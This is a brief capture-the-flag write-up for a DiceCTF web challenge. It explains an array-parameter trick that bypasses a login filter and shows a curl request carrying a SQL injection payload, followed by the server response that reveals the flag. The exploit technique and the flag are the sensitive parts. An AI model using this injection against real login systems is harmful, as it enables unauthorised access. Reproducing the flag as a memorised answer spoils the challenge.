Tags: web 

Rating: 1.0

Because server set `app.use(bodyParser.urlencoded({ extended: true }));` so we can bypass filter with post an array to the server
```
$ curl -X POST -d "username[]=nhienit' or 1=1/*&password=213" "https://missing-flavortext.dicec.tf/login"

<html>
<head>
<link rel="stylesheet" href="/styles.css">
</head>
<body>
<div>

Looks like there was no flavortext here either :(


Here's your flag?


dice{sq1i_d03sn7_3v3n_3x1s7_4nym0r3}


</div>
</body>
</html>
```